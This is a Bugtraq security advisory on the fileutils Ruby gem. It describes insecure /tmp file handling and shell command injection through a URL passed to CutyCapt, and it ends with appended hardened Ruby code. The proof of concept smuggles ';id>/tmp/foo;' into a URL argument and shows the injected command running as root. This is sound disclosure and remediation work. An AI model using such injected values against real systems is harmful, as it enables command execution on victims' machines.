Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- From: larry0@xxxxxx
- Date: Thu, 28 Feb 2013 18:11:01 GMT
Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
2/23/2013
Hi list, I was looking at some gem files and noticed a few issues with fileutils-0.7
http://rubygems.org/gems/fileutils
"A set of utility classes to extract meta data from different file types".
The gem handles files insecurely in /tmp: a directory is created for each file
extension, say 'zip', and files are created and modified there. This directory can be
hijacked and its contents manipulated by a malicious user.
in ./lib/file_utils.rb (the interpolation markers were lost in transit; the gem's code reads "#{...}"):
  def zip (target, *sources)
    targetdir = "#{FileUtils::Config.tmp_dir}/zip"
    id = 1
    while File.exists?(targetdir)
      targetdir = "#{FileUtils::Config.tmp_dir}/zip#{id}"
      id += 1
    end
    FileUtils.mkdir(targetdir)
where Config.tmp_dir is '/tmp', in ./lib/file_utils/config.rb:
  def self.tmp_dir
    @tmp_dir ||= '/tmp'
  end
Remote command execution:
file_utils.rb does not sanitize the URL it passes to CutyCapt for execution. If a URL
contains shell metacharacters, say a ';' followed by a command, a remote attacker can
execute a command on the client's system if the user is enticed to click an encoded URL
like the one below.
Need to test URL encoding; not sure if this is valid.
http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz
  def capture (url, target)
    command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) +
      "/../bin/CutyCapt --min-width=1024 --min-height=768 --url=#{url} --out=#{target}")
    `#{command}`
  end
Partial PoC if the client is tricked into using a malicious URL:
irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf`
xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# ls -l /tmp/foo
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt# cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#
Michael Scherer of Redhat.com found other issues during a discussion about the
above issues I found:
In fact, there is the same similar problem in another file:
  result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`
I quickly checked using irb (a quick command line to type ruby snippets), and
yes, using funky chars results in funky results.
There is another issue in
  # Generates a temp filepath for the given extension
  def temp (extension)
    path = "#{FileUtils::Config.tmp_dir}/tmp.#{extension}"
    id = 1
    while File.exists?(path)
      path = "#{FileUtils::Config.tmp_dir}/tmp.#{id}.#{extension}"
      id += 1
    end
    path  # the quoted fragment stopped at the loop; returning the path and the closing end are assumed here
  end
Since someone could just create the file at the last moment, and make a link so
the script would overwrite an arbitrary file.
Thanks to vl4dz and Michael.
Larry W. Cashdollar @_larry0
http://vapid.dhs.org
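Hardened forms of the two patterns above (the interpolated `...` call and the guessable /tmp paths), as an added example that is not code from the fileutils gem or from the posters. It assumes Ruby's standard open3, tmpdir and uri libraries; CutyCapt itself is never executed, and the `program` parameter is a stand-in so the call can be exercised with a harmless binary.

```ruby
require 'open3'
require 'tmpdir'
require 'uri'

# Added example, not code from the fileutils gem: hardened forms of the two
# patterns in the advisory. CutyCapt itself is never run here.

# Issue 1: the gem builds one string for `...`, so /bin/sh parses the URL and
# a ';' starts a second command. Fix: allow only http(s), and pass argv to
# Open3.capture2 as separate elements, which execs the program directly
# without a shell, so metacharacters in the URL stay inside one argument.
def capture_argv(url, target)
  scheme = begin
    URI.parse(url).scheme
  rescue URI::InvalidURIError
    nil
  end
  raise ArgumentError, "refusing URL #{url.inspect}" unless %w[http https].include?(scheme)
  ['CutyCapt', '--min-width=1024', '--min-height=768', "--url=#{url}", "--out=#{target}"]
end

# program: stand-in binary (e.g. 'echo') so the call can be exercised without CutyCapt.
def capture(url, target, program = 'CutyCapt')
  argv = capture_argv(url, target)
  argv[0] = program
  out, status = Open3.capture2(*argv)
  status.success? ? out : nil
end

# Issue 2: /tmp/zip, /tmp/zip1, ... and /tmp/tmp.zip are guessable, and the
# exists? loop is a check, not a reservation: another local user can plant the
# name, or a symlink to a file they want clobbered, between check and write.
# Fix: Dir.mktmpdir creates a 0700 directory with a random suffix, and
# O_CREAT|O_EXCL|O_NOFOLLOW makes open fail with EEXIST if anything (a
# symlink included) already sits at the path instead of following it.
def safe_workdir
  Dir.mktmpdir('fileutils-')
end

def safe_create(path, data)
  flags = File::WRONLY | File::CREAT | File::EXCL | File::NOFOLLOW
  File.open(path, flags, 0600) { |f| f.write(data) }
  path
end
```

Note that URL validation alone is not the fix: `http://www.example.org;id;` is a syntactically valid URL, so only the argv form keeps the `;id;` from ever reaching a shell.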